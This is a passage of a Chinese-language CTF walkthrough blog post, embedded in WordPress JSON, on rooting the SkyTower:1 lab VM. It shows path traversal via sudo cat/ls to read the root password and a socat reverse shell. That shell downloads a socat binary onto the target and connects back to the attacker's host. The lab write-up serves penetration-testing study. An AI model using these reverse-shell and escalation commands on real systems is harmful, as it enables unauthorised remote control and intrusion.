\u8fdb\u884c\u767b\u9646\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608791.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608791.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221153722263\" \/><\/div><\/p>\n<p>\u663e\u793a\u53ef\u4ee5\u4ee5root\u6743\u9650\u6267\u884c<code>cat\/ls<\/code>\u5bf9<code>\/accounts<\/code>\uff0c\u76ee\u5f55\u7a7f\u8d8a\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608792.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608792.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221154401243\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6flag\uff0c\u4ece\u800c\u83b7\u53d6\u5230\u4e86root\u5bc6\u7801\uff0c\u83b7\u53d6\u5230\u4e86root\u6743\u9650\uff01\uff01\uff01<\/p>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<p>\u4f7f\u7528<code>-C bash<\/code>\u83b7\u53d6\u5230\u4e86shell\u4ee5\u540e\uff0c\u6211\u4eec\u9700\u8981\u83b7\u53d6\u66f4\u52a0\u65b9\u4fbf\u7684shell\uff0c\u6211\u5728\u4e00\u4e2a\u5e08\u5085\u7684<a href=\"https:\/\/www.c0dedead.io\/skytower-1-walkthrough\/\">blog<\/a>\u4e0a\u770b\u5230\u4e86\u76f8\u5173\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\nsocat file:`tty`,rawer tcp-listen:4444,reuseaddr\n# SkyTower\ncd \/home\/john\nwget --no-check-certificate https:\/\/github.com\/ernw\/static-toolbox\/releases\/download\/socat-v1.7.4.4\/socat-1.7.4.4-x86_64 -O socat\nchmod +x socat\nHOME=\/dev\/shm .\/socat tcp:192.168.244.128:4444 exec:&#039;\/bin\/bash -li&#039;,pty,stderr,sigint,sighup,sigquit,sane\n# \u6b3a\u9a97 Bash \u751f\u6210\u4e00\u4e2a shell\u3002\u66f4\u6539\u4e3b\u76ee\u5f55\uff0c\u5b83\u5c31\u4f1a\u8d77\u4f5c\u7528\uff0c\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6eHOME\u73af\u5883\u53d8\u91cf\u6765\u505a\u5230\u8fd9\u4e00\u70b9\u3002<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608793.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608793.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221160354272\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u83b7\u53d6\u5230\u4e86shell\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SKYTOWER: 1 \u6253\u5f00\u9776\u673a\uff0c\u8bbe\u4e3aNAT\u6a21\u5f0f\uff1a \u626b\u4e00\u4e0b\uff0c\u6ca1\u626b\u51fa\u6765\uff1a \u751f\u6210\u9776\u573a \u7528vmware\u6253\u5f00\u8bd5\u8bd5\uff0c\u5148\u8981 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-371","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/371","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=371"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/371\/revisions"}],"predecessor-version":[{"id":372,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/371\/revisions\/372"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=371"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=371"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=371"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}